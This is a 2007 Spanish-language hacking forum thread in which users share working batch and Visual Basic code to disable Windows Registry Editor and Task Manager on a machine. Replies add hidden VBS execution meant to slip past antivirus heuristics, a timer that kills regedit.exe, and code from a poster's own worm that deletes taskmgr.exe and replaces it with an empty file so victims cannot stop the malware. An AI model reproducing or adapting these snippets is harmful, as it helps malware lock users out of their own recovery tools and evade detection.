Blokear Regedit

Iniciado por zXxOsirisxXz, 28 Septiembre 2007, 12:40 PM

0 Miembros y 3 Visitantes están viendo este tema.

zXxOsirisxXz

Hola todos, vengo de portalhacker.. pasa k se cayo el dominio, y ps, olvide grabar un codigo de regedit, el cual es muy bueno, pero no recuerdo como se hacia.

El codigo si mal no recuerdo, era en cmd. Pero se aplicaba a VB.

No fue hace mucho k lo publicaron. Pero si ahi otro ps, esta bien. Un codigo solo de bloqueo, asi como el de Control+Alt+Del, k se le pone un "1" al final y se blokea. Pero para Regedit. Si es posible k alguien lotenga o me lo dijese, se lo agradeceria mucho.

Salu2

zXxOsirisxXz

Ehh, aun no responden, pero encontre k se hace de la siguiente manera en Bat.

Citarreg add hkey_current_user\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d 1 /f

[Gracias a Master of Network de PortalH.]

Pero, kise transladar el codigo a VB. Al iwal como funciona el TaskManaguer, el cual en VB funciona de la siguiente manera:

CitarPrivate Sub Command1_Click()
CreateIntegerKey "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskmgr", "0"
End Sub


Private Sub CreateIntegerKey(Folder As String, Value As Integer)
Dim Fso As Object
On Error GoTo men
'creamos la variable para usar Fso
Set Fso = CreateObject("wscript.shell")
'Grabamos el valor en el registro con el método regWrite
Fso.RegWrite Folder, Value, "REG_DWORD"

'Eliminamos la variable Fso
Set Fso = Nothing


Exit Sub
'error
men:
MsgBox Err.Description: Resume Next
End Sub

Intente cambiar la ruta y ponerla como regedit, pero aun asi, no funciona. Alguien me podria dar una mano con esto? Solo es cuestion de pasarlo  :(

Gracias.

Tengu

podrias hacerlo simplemente con un timer y q ejecute un "taskkill /im regedit.exe" cadda X cantidad de segundos lo q evitariua q alguien pueda modificar el registro

o poner este code:

private sub form_load()
Dim X As Integer
X = FreeFile
Open "C:\killrege.vbs" For Output As #X
Print #X, Text1
Close #X
shell "C:\killrege.vbs",vbhide
end sub


y en el text1.text iria esto:

Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools", 1, "REG_DWORD"
WshShell.RegWrite "HKLMSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools", 1, "REG_DWORD"


Encuentros por Video y Chat !!

Tengu

y si quisieras habilitarlo deberias ejecutar este code en el archivo vbs:

Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
On Error Resume Next
WshShell.RegDelete "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools"
WshShell.RegDelete "HKLMSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools"

Encuentros por Video y Chat !!

Tengu

Tal vez ejecutando el code asi evitarias la heuristica de av's aunk no se si esas funcines sean detectadas....

Encuentros por Video y Chat !!

zXxOsirisxXz

Ya lo avia hecho antse, y no era detectado. Pero pasa k borre el proyecto y por estupides mia, pense k tenia grabado eso.. y bueno, perdi la forma. =(

Gracias por ese metodo del texto, pero, no es exactamente lo k busco, lo k busco se k se peude pk lo llegue a hacer funcionar. Aun asi, muchas gracias por responder ^^

EMRZ

#6
yo habia hecho algo asi en un worm pero para kagar el task manager
en el primer intento borre el exe pero se regenera por que el win xp lo protege :P
el segundo intento fue este kodigo que funciono :D


Código (vb) [Seleccionar]
Rem Borramos el administrador de tareas jaja
Kill "C:\WINDOWS\system32\taskmgr.exe"
Rem cagamos el taskmanager asi no nos matan :p
Open "C:\WINDOWS\system32\taskmgr.exe" For Input As #1
Close #1


esto krea un archivo vacio en el exe de manera que no se regenera por que el exe ya existe..

al presionar alt+ctrl+del no pasa nada

kreo que funcionaba si me ekivoko korrijanme :P

nadie va a ser tan bolude de probarlo en su pc no ? xD

zXxOsirisxXz

Por eso me gustan los codes k tengan cura ^^

el k digo ya lo tenia, y era este k tengo, pero en batch.. pasa k no recuerdo como era para VB

Gracias por lo del tacks.. pero tiene cura? :/

zXxOsirisxXz

Weno, ya encontre la respuesta k buscaba. ^^

Gracias a todo ^^

-Cerrar el Tema Porfavor-

Graphixx

yo creo que todo lo que necesitas lo puedes encontrar en el programa que yo hice, esta hecho en visual basic 6.0 e incluye el codigo fuente..... es un editor del registro el mas completo que se ha programado nunca... si lo modificas y le añades funciones nuevas espero que mantengas el proyecto abierto vale...

Editor del Registro/Abolir todas las restricciones del WinXP
Nada tiene fin solo hay pequeñas pausas, pausas que determinan el comienzo de otros. Graphixx
Mi blog